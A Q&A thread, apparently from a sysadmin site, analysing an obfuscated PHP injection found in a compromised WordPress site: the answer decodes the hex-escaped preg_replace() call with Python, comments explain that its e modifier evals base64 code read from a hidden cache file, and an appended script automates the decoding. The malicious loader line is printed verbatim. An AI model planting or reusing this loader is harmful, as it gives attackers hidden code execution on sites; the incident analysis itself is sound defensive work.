5

I found an offending string in a client's WordPress-powered website, and I just want to know what it does.

@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");

Can someone outline the steps it takes to decode this? I know what preg_replace() is, but I don't know how to decode the arguments to the function, or how PHP processes it into something it can make use of.

Dennis Wurster

1 Answer

10

Interesting. I like using python for this kind of task. You can follow along in a python (3.x) command line:

Input:

print(b"\x40\50\x2e\53\x29\100\x69\145")

Output:

b'@(.+)@ie'

Input:

print(b"\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75")

Output:

b'eval(base64_decode(implode("\\n",file(base64_decode("\\1")))));' L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==

That chunk of garbage is base64, as the call would imply, so let's keep going.

Input:

import base64
base64.b64decode(b"L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==")

Output:

b'/home/web/users/2029.big6/sites/big6/public_html/forum/bb-includes/js/jquery/.cache/.%828E%0013%B8F3%BC1B%B22B%4F57'

It looks like to get a good idea of what's going on, a closer look would be needed at the rest of the site, particularly that file that it's referencing; it's probably full of more lines of base64 encoded code. I think it is safe to assume that the site is pretty well compromised, though. It's a good idea to pull the content and clean anything like this out, and start fresh with a new instance.

Shane Madden
  • This tickled my brain! – Campo Mar 18 '11 at 22:58
  • Actually, PHP has the same functions, that do the same thing. The "e" flag in preg_replace() tells PHP that once it's done substituting the L2hvb...== junk for `\1` in the command there, it should execute the command. The command reads that cache file into an array, implodes it into a string (which is apparently itself base64 encoded), then evaluates it. – DerfK Mar 18 '11 at 22:59
  • @DerfK Yeah, that hit me right after I posted - the `implode()` call made me stop and think, since that doesn't exist in python. Edited, thanks :) – Shane Madden Mar 18 '11 at 23:01
  • Just for the fun of it, I took a peek at the "/public_html/forum/bb-includes/js/jquery/.cache/.%828E%0013%B8F3%BC1B%B22B%4F57" file. The client installed Simple:Press a while back, a nice-but-primitive forum app. – Dennis Wurster Mar 19 '11 at 01:40
  • What I found in the /.cache/ directory was a collection of 10 different files, all base64 encoded. The specific file pointed to had contents related to building fake blog entries. As best as I can tell, it looks like it was only intending to show its fake pages to search engine spiders, and not to human visitors. – Dennis Wurster Mar 19 '11 at 02:02
  • @Dennis Huh. Interesting! Thanks for sharing what you found. – Shane Madden Mar 19 '11 at 02:04
  • Yeah, it was interesting, once I could read it. :-) I can't really tell if the vulnerability is in WordPress itself, a plugin, the ISP's server configuration, or the bbPress forum software though. I did find out that the installed version of bbPress was 1.0.1, and that there was a unix timestamp in some of the code that related to a date last October. I kept a copy of the 10 files before deleting them from the host. I'd put them somewhere in this post just for future readers' curiosity's sake. Any ideas about how to go about that? – Dennis Wurster Mar 19 '11 at 02:25
  • @Dennis Maybe put them on something like pastebin? As far as which software to blame: When in doubt, blame WordPress. – Shane Madden Mar 19 '11 at 02:30
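Putting the answer's decoding steps and DerfK's point about the `e` modifier together, here is an added Python 3 script (not part of the original answer or of any PHP tooling) that unescapes all three preg_replace() arguments in one pass, splits the pattern into regex body and modifiers, and reports whether those modifiers would make PHP execute the replacement. The only input is the injected line itself, copied from the question; the note that `e` was deprecated in PHP 5.5 and removed in PHP 7.0 is from PHP's own documentation.

```python
import base64
import re

# The three preg_replace() arguments, copied verbatim from the injected line in
# the question (PHP double-quoted string bodies, before PHP unescapes them).
PATTERN_SRC = r"\x40\50\x2e\53\x29\100\x69\145"
REPL_SRC = r"\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b"
SUBJECT_SRC = r"\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75"

# Escapes PHP recognises inside double quotes, besides \xHH and octal \NNN.
SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "$": "$"}
PHP_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)", re.S)

def php_unescape(src: str) -> str:
    """Expand PHP double-quoted-string escapes in a single pass. A backslash
    produced by \\x5c is NOT re-read together with the next escape, exactly as
    in PHP, which is why "\\x5c\\156" yields the two characters \\ and n."""
    def expand(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8) & 0xFF)   # PHP wraps octal to a byte
        return SIMPLE_ESCAPES.get(m.group(3), "\\" + m.group(3))
    return PHP_ESCAPE.sub(expand, src)

def split_pcre(pattern: str):
    """Split a PHP regex literal into (body, modifiers) using its delimiter."""
    delim = pattern[0]
    end = pattern.rindex(delim)
    return pattern[1:end], pattern[end + 1:]

def analyse(pattern_src: str, repl_src: str, subject_src: str) -> dict:
    pattern, repl, subject = (php_unescape(s) for s in (pattern_src, repl_src, subject_src))
    body, mods = split_pcre(pattern)
    try:   # the subject is only useful if it really is base64, as here
        decoded = base64.b64decode(subject, validate=True).decode("latin-1")
    except ValueError:
        decoded = None
    return {
        "regex": body,
        "modifiers": mods,
        # With the e modifier preg_replace() eval()s the replacement after
        # substituting \1; deprecated in PHP 5.5, removed in PHP 7.0.
        "executes_replacement": "e" in mods,
        "replacement": repl,
        "subject_base64": subject,
        "subject_decoded": decoded,
    }

if __name__ == "__main__":
    for key, value in analyse(PATTERN_SRC, REPL_SRC, SUBJECT_SRC).items():
        print(f"{key}: {value!r}")
```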